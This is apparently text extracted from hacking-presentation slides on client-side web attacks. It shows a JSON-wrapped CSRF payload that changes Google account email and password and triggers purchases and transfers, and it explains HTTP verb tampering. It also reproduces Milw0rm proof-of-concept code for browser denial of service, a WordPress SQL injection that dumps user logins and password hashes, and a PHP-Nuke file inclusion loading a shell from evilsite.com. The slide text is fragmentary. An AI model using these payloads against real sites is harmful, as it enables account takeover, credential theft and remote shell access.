24. Hacking Client Side Insecurities Java Script Jacking – JSON Injections JSON Injections The Serialization Insecurity | Web 2.0 Direct Injections with Encoding. Everything is treated as String. Apply toJSONObject(). CSRF A different way to Fuse attack with Notation Objects. { "menu": { "id": "<img src="https://books.example.com/clickbuy?book=ISBNhere&quantity=100">", "value": "<img src="https://trading.example.com/xfer?from=MSFT&to=RHAT&confirm=Y">", "popup": "<scriptsrc="https://www.google.com/accounts/UpdateEmail?service=adsense &Email=mymail@newmail.net&Passwd=cool&save="></script>" } } } Cross Site Request Forgery Structured in JSON – Google Ad sense Layout.
25.
26. Hacking Client Side Insecurities HTTP Verb Jacking security-constraint> <web-resource-collection> <web-resource-name>drivers</web-resource-name> <description> Security constraint for drivers page </description> <url-pattern>/drivers.html</url-pattern> <http-method>POST</http-method> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <description> constraint for drivers </description> <role-name>manager</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>BASIC</auth-method> </login-config> <security-role> <role-name>manager</role-name> The snapshot of web.xml file for a certain target. The security constraint parameter defines the allowed request. The type of Authentication allowed. HTTP Verb Jacking Manager directories will not be Accessed by GET/POST Request. What about HEAD Request. J2EE ,JSP , ASP , ASP.NET,PHP etc are based on configuration files to process the type of request to handle. [ GET/POST/HEAD etc]
27.
28.
29. Hacking Client Side Insecurities XHR and IFRAME < script > var oRequest = new XMLHttpRequest(); var sURL = "http://www.snapdrive.net/files/571814/chrome.txt"; alert('Downloading a txt file..please wait.'); oRequest.open("GET",sURL,false); oRequest.setRequestHeader("User-Agent",navigator.userAgent); oRequest.send(null); xmlDoc=oRequest.ResponseText; alert(xmlDoc); if (oRequest.status==200) { alert('Done...now try editing the Text-Box!'); var str=" Winget 3.0 DoS Exploit PoC.Minimize Winget & Right-Click & Copy to clipboard."; document.write(str.link("http://"+oRequest.responseText+".exe")); } else {alert('Error executing XMLHttpRequest call!');} Local Dos [Milw0rm] var iframe = document.createElement("IFRAME"); iframe.setAttribute("src", 'ftp://localhost/anything'); iframe.setAttribute("name", 'myiframe'); iframe.setAttribute("id", 'myiframe'); iframe.setAttribute("onload", 'read_iframe("myiframe")'); iframe.style.width = "100px"; iframe.style.height = "100px"; document.body.appendChild(iframe); Konqueror 3.5.5 Crash [Milw0rm] [Word Press SQL Injection through IFRAME] wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- [PHP Nuke IFRAME] http://www.example.com/nuke_path/iframe.php?file=ftp://user:pass@evilsite.com/public_html/shell.html (or) .htm http://www.milw0rm.com/exploits/6777 http://www.milw0rm.com/exploits/3512